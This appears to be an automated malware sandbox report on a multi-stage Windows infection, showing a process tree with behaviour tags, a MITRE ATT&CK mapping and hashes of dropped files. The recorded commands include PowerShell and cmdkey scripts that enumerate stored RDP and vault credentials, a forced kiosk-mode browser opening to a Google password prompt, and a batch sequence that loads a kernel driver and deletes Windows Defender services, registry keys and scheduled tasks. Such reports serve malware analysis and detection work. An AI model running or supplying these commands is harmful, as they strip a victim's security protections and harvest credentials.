C:\Windows\system32\taskkill.exe"taskkill" /F /IM slimjet.exe4⤵PID:2280
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM cent_browser.exe4⤵
- Kills process with taskkill
PID:6744
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM epic.exe4⤵PID:4920
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM torch.exe4⤵
- Kills process with taskkill
PID:6724
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM whale.exe4⤵
- Kills process with taskkill
PID:7084
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM 360browser.exe4⤵
- Kills process with taskkill
PID:6964
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM qqbrowser.exe4⤵
- Kills process with taskkill
PID:6684
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM browser.exe4⤵
- Kills process with taskkill
PID:7004
-
-
C:\Windows\system32\vaultcmd.exe"vaultcmd" /list4⤵PID:4472
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list4⤵PID:6592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "4⤵
- Command and Scripting Interpreter: PowerShell
PID:5552 -
C:\Windows\system32\cmdkey.exe"C:\Windows\system32\cmdkey.exe" /list5⤵PID:3848
-
-
-
C:\Windows\system32\certutil.exe"certutil" -store My4⤵PID:5740
-
-
C:\Windows\system32\certutil.exe"certutil" -store -user My4⤵PID:4388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Get-VpnConnection | ConvertTo-Json"4⤵
- Command and Scripting Interpreter: PowerShell
PID:5692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "4⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
PID:5204
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list4⤵PID:5152
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list:TERMSRV/69.48.201.744⤵PID:1172
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List4⤵PID:3264
-
-
C:\Windows\system32\hostname.exe"hostname"4⤵PID:2748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Get-WmiObject Win32_VideoController | ForEach-Object { $_.Name }"4⤵
- Command and Scripting Interpreter: PowerShell
PID:6132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Get-NetAdapter | Where-Object { $_.Status -eq 'Up' -and $_.InterfaceDescription -notmatch 'virtual|loopback' } | Sort-Object -Property LinkSpeed -Descending | Select-Object -First 1 -ExpandProperty MacAddress"4⤵
- Command and Scripting Interpreter: PowerShell
PID:1100
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List4⤵PID:3140
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall show allprofiles state4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6452
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416710101\275ebaba42.exe"C:\Users\Admin\AppData\Local\Temp\10416710101\275ebaba42.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2316
-
-
C:\Users\Admin\AppData\Local\Temp\10416720101\ac5ed4bbfd.exe"C:\Users\Admin\AppData\Local\Temp\10416720101\ac5ed4bbfd.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4008 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10416720101\ac5ed4bbfd.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2344
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416730101\43b13e599f.exe"C:\Users\Admin\AppData\Local\Temp\10416730101\43b13e599f.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4008 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10416730101\43b13e599f.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5168
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416740101\7381290483.exe"C:\Users\Admin\AppData\Local\Temp\10416740101\7381290483.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5340
-
-
C:\Users\Admin\AppData\Local\Temp\10416750101\68ab528098.exe"C:\Users\Admin\AppData\Local\Temp\10416750101\68ab528098.exe"3⤵
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5744 -
C:\Users\Admin\AppData\Local\IeGkDOqzXwi9.exe"C:\Users\Admin\AppData\Local\IeGkDOqzXwi9.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4928
-
-
C:\Users\Admin\AppData\Local\5JJTKUd3aM0z.exe"C:\Users\Admin\AppData\Local\5JJTKUd3aM0z.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2392
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416760101\b57d7fa1b5.exe"C:\Users\Admin\AppData\Local\Temp\10416760101\b57d7fa1b5.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5552 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:5696
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:5644
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4180
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
PID:5932
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:5116
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:5872
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5892 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2012 -prefsLen 27099 -prefMapHandle 2016 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {ce1c9167-6786-464f-b109-4266d565b8f7} -parentPid 5892 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5892" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu6⤵PID:5144
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2492 -prefsLen 27135 -prefMapHandle 2496 -prefMapSize 270279 -ipcHandle 2412 -initialChannelId {23a94d39-5c8f-4d31-8fa6-12728afdd4a6} -parentPid 5892 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5892" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket6⤵
- Checks processor information in registry
PID:5152
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3832 -prefsLen 25213 -prefMapHandle 3836 -prefMapSize 270279 -jsInitHandle 3840 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3848 -initialChannelId {aaa1eeb1-c547-43a6-91fc-c3ac3c2ffb29} -parentPid 5892 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5892" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab6⤵
- Checks processor information in registry
PID:4012
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3976 -prefsLen 27325 -prefMapHandle 3980 -prefMapSize 270279 -ipcHandle 4132 -initialChannelId {7447f60f-9df6-450e-8230-b568366b7142} -parentPid 5892 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5892" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd6⤵PID:2800
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4396 -prefsLen 34824 -prefMapHandle 4400 -prefMapSize 270279 -jsInitHandle 4404 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2864 -initialChannelId {e4690764-8331-408c-89dc-6ea179d758b3} -parentPid 5892 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5892" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab6⤵
- Checks processor information in registry
PID:3964
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 3212 -prefsLen 35012 -prefMapHandle 3024 -prefMapSize 270279 -ipcHandle 2668 -initialChannelId {07dca08e-bb61-4f37-9414-986d11f5d7c3} -parentPid 5892 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5892" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility6⤵
- Checks processor information in registry
PID:6736
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5148 -prefsLen 32952 -prefMapHandle 5152 -prefMapSize 270279 -jsInitHandle 5156 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5164 -initialChannelId {2affe936-3af3-42ee-b9a0-c4411a00efec} -parentPid 5892 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5892" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab6⤵
- Checks processor information in registry
PID:6792
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5224 -prefsLen 32952 -prefMapHandle 5228 -prefMapSize 270279 -jsInitHandle 5232 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5240 -initialChannelId {2ecc7508-7804-4197-b866-44faa22dd836} -parentPid 5892 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5892" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab6⤵
- Checks processor information in registry
PID:6800
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5572 -prefsLen 32952 -prefMapHandle 5576 -prefMapSize 270279 -jsInitHandle 5580 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5588 -initialChannelId {047e6be9-0b96-4a5c-a708-a720f1b9f4bc} -parentPid 5892 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5892" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab6⤵
- Checks processor information in registry
PID:6828
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416770101\b43c992318.exe"C:\Users\Admin\AppData\Local\Temp\10416770101\b43c992318.exe"3⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5348
-
-
C:\Users\Admin\AppData\Local\Temp\10416780101\9a3f4a2326.exe"C:\Users\Admin\AppData\Local\Temp\10416780101\9a3f4a2326.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4140 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:1232
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
PID:5356
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416790101\136d7a97c3.exe"C:\Users\Admin\AppData\Local\Temp\10416790101\136d7a97c3.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6276
-
-
C:\Users\Admin\AppData\Local\Temp\10416800101\YGYZCmt.exe"C:\Users\Admin\AppData\Local\Temp\10416800101\YGYZCmt.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1620 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:3192
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
PID:4484
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416810101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10416810101\Rm3cVPI.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3760
-
-
C:\Users\Admin\AppData\Local\Temp\10416820101\p3hx1_003.exe"C:\Users\Admin\AppData\Local\Temp\10416820101\p3hx1_003.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:1448 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'4⤵PID:2968
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'5⤵
- Command and Scripting Interpreter: PowerShell
PID:6432
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"4⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:6188 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""5⤵
- Executes dropped EXE
PID:1624
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""5⤵
- Deletes itself
- Executes dropped EXE
PID:5164
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416830101\qWR3lUj.exe"C:\Users\Admin\AppData\Local\Temp\10416830101\qWR3lUj.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6628 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
PID:5304
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5992 -
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5488 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6603.tmp\6604.tmp\6605.bat C:\Users\Admin\AppData\Local\Temp\261.exe"5⤵PID:2916
-
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe" go6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5740 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\67A9.tmp\67AA.tmp\67AB.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"7⤵
- Drops file in Program Files directory
PID:6636 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"8⤵
- Launches sc.exe
PID:6932
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:5024
-
-
C:\Windows\system32\timeout.exetimeout /t 18⤵
- Delays execution with timeout.exe
PID:5676
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:6736
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:4612
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5784
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3748
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"8⤵
- Launches sc.exe
PID:7124
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"8⤵
- Launches sc.exe
PID:5288
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f8⤵PID:1292
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"8⤵
- Launches sc.exe
PID:6076
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"8⤵
- Launches sc.exe
PID:5308
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f8⤵PID:7032
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"8⤵
- Launches sc.exe
PID:3164
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"8⤵
- Launches sc.exe
PID:5940
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f8⤵PID:3136
-
-
C:\Windows\system32\sc.exesc stop "Sense"8⤵
- Launches sc.exe
PID:5228
-
-
C:\Windows\system32\sc.exesc delete "Sense"8⤵
- Launches sc.exe
PID:5352
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f8⤵PID:4160
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"8⤵
- Launches sc.exe
PID:5648
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"8⤵
- Launches sc.exe
PID:5432
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f8⤵
- Modifies security service
PID:4112
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"8⤵
- Launches sc.exe
PID:3224
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"8⤵
- Launches sc.exe
PID:4720
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f8⤵PID:4468
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"8⤵
- Launches sc.exe
PID:4832
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"8⤵
- Launches sc.exe
PID:2604
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f8⤵PID:3708
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"8⤵
- Launches sc.exe
PID:1840
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"8⤵
- Launches sc.exe
PID:2348
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f8⤵PID:1172
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:3512
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:5128
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f8⤵PID:660
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"8⤵
- Launches sc.exe
PID:1716
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"8⤵
- Launches sc.exe
PID:2304
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f8⤵PID:5472
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"8⤵
- Launches sc.exe
PID:4456
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"8⤵
- Launches sc.exe
PID:2684
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f8⤵PID:5136
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"8⤵
- Launches sc.exe
PID:3264
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"8⤵
- Launches sc.exe
PID:6620
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f8⤵PID:3144
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"8⤵
- Launches sc.exe
PID:2748
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"8⤵
- Launches sc.exe
PID:2484
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f8⤵PID:5212
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"8⤵
- Launches sc.exe
PID:3852
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"8⤵
- Launches sc.exe
PID:5752
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f8⤵PID:6892
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"8⤵
- Launches sc.exe
PID:6920
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"8⤵
- Launches sc.exe
PID:4956
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f8⤵PID:1424
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"8⤵
- Launches sc.exe
PID:4928
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"8⤵
- Launches sc.exe
PID:5332
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f8⤵PID:6108
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f8⤵PID:5728
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f8⤵PID:2256
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f8⤵PID:3464
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f8⤵PID:5956
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:4180
-
-
C:\Windows\system32\sc.exesc delete ddrver8⤵
- Launches sc.exe
PID:3576
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2344
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:2928
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:5572
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:5136
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3580
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:6260
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:6288
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
8Windows Service
8Event Triggered Execution
1Netsh Helper DLL
1Modify Authentication Process
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
8Windows Service
8Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
File and Directory Permissions Modification
1Hide Artifacts
1Ignore Process Interrupts
1Impair Defenses
7Disable or Modify System Firewall
1Disable or Modify Tools
5Modify Authentication Process
1Modify Registry
7Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
5Credentials In Files
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
649B
MD53545a00907ee206199a29b3f39eee5cf
SHA1c07d7734fea6eb84702b5b525a2e3003046b96a2
SHA2565db067b2327739f35a7d828afd34d0a7c640b87e54bf7446b2586fbe4dc82912
SHA5120d9a5382599bdc2666f5c8b661d1687a7cdabe616bf62c9174a29d17208e5cc16a13fd944696505f170bab7bfcec604c8d181b9c3f078004a2d1795179e4d064
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
9KB
MD52c810821228d61099b924cfb353c49cb
SHA1495965aa49e2534ef7897876730316b04768661c
